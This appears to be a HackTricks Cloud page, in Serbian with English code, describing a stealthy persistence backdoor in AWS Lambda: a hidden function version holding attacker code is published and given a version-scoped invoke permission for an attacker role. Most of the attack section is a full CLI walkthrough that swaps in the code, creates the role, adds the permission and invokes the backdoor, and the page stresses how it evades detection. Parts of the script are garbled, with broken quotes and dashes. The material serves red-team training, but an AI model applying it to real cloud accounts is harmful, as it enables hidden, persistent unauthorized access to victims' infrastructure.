AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Sažetak

Kreirajte skrivenu Lambda verziju sa attacker logikom i primenite resource-based policy na tu konkretnu verziju (ili alias) korišćenjem parametra --qualifier u lambda add-permission. Dodelite samo lambda:InvokeFunction na arn:aws:lambda:REGION:ACCT:function:FN:VERSION attacker principalu. Normalna pozivanja preko imena funkcije ili primarnog alias-a ostaju nepromenjena, dok attacker može direktno pozvati backdoored verziju koristeći njen ARN.

Ovo je diskretnije od izlaganja Function URL i ne menja primarni alias za saobraćaj.

Potrebne dozvole (attacker)

  • lambda:UpdateFunctionCode, lambda:UpdateFunctionConfiguration, lambda:PublishVersion, lambda:GetFunctionConfiguration
  • lambda:AddPermission (to add version-scoped resource policy)
  • iam:CreateRole, iam:PutRolePolicy, iam:GetRole, sts:AssumeRole (to simulate an attacker principal)

Koraci napada (CLI)

Objavite skrivenu verziju, dodajte dozvolu ograničenu na qualifier, pozovite kao attacker ```bash # Vars REGION=us-east-1 TARGET_FN=

[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., “main”) stays on a clean version

aws lambda create-alias –function-name “$TARGET_FN” –name main –function-version –region “$REGION”

1) Build a small backdoor handler and publish as a new version

cat > bdoor.py <<PY import json, os, boto3

def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {“ht”: True, “who”: ident, “env”: {“fn”: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code –function-name “$TARGET_FN” –zip-file fileb://bdoor.zip –region $REGION aws lambda update-function-configuration –function-name “$TARGET_FN” –handler bdoor.lambda_handler –region $REGION until [ “$(aws lambda get-function-configuration –function-name “$TARGET_FN” –region $REGION –query LastUpdateStatus –output text)“ = “Successful” ]; do sleep 2; done VER=$(aws lambda publish-version –function-name “$TARGET_FN” –region $REGION –query Version –output text) VER_ARN=$(aws lambda get-function –function-name “$TARGET_FN:$VER” –region $REGION –query Configuration.FunctionArn –output text) echo “Published version: $VER ($VER_ARN)”

2) Create an attacker principal and allow only version invocation (same-account simulation)

ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role –role-name $ATTACK_ROLE_NAME –assume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { “Version”: “2012-10-17”, “Statement”: [{ “Effect”: “Allow”, “Action”: [“lambda:InvokeFunction”], “Resource”: [“$VER_ARN”] }] } POL aws iam put-role-policy –role-name $ATTACK_ROLE_NAME –policy-name ht-invoke-version –policy-document file:///tmp/invoke-policy.json

Add resource-based policy scoped to the version (Qualifier)

aws lambda add-permission
–function-name “$TARGET_FN”
–qualifier “$VER”
–statement-id ht-version-backdoor
–action lambda:InvokeFunction
–principal arn:aws:iam::$(aws sts get-caller-identity –query Account –output text):role/$ATTACK_ROLE_NAME
–region $REGION

3) Assume the attacker role and invoke only the qualified version

ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity –query Account –output text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role –role-arn “$ATTACK_ROLE_ARN” –role-session-name htInvoke –query Credentials –output json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke –function-name “$VER_ARN” /tmp/ver-out.json –region $REGION >/dev/null cat /tmp/ver-out.json

4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role

aws lambda remove-permission –function-name “$TARGET_FN” –statement-id ht-version-backdoor –qualifier “$VER” –region $REGION || true

</details>

## Impact

- Obezbeđuje neprimetan backdoor za pozivanje skrivene verzije funkcije bez menjanja primarnog alias-a ili izlaganja Function URL-a.
- Ograničava izloženost samo na navedenu verziju/alias preko resource-based policy `Qualifier`, smanjujući površinu detekcije dok zadržava pouzdano pozivanje za principal napadača.

> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>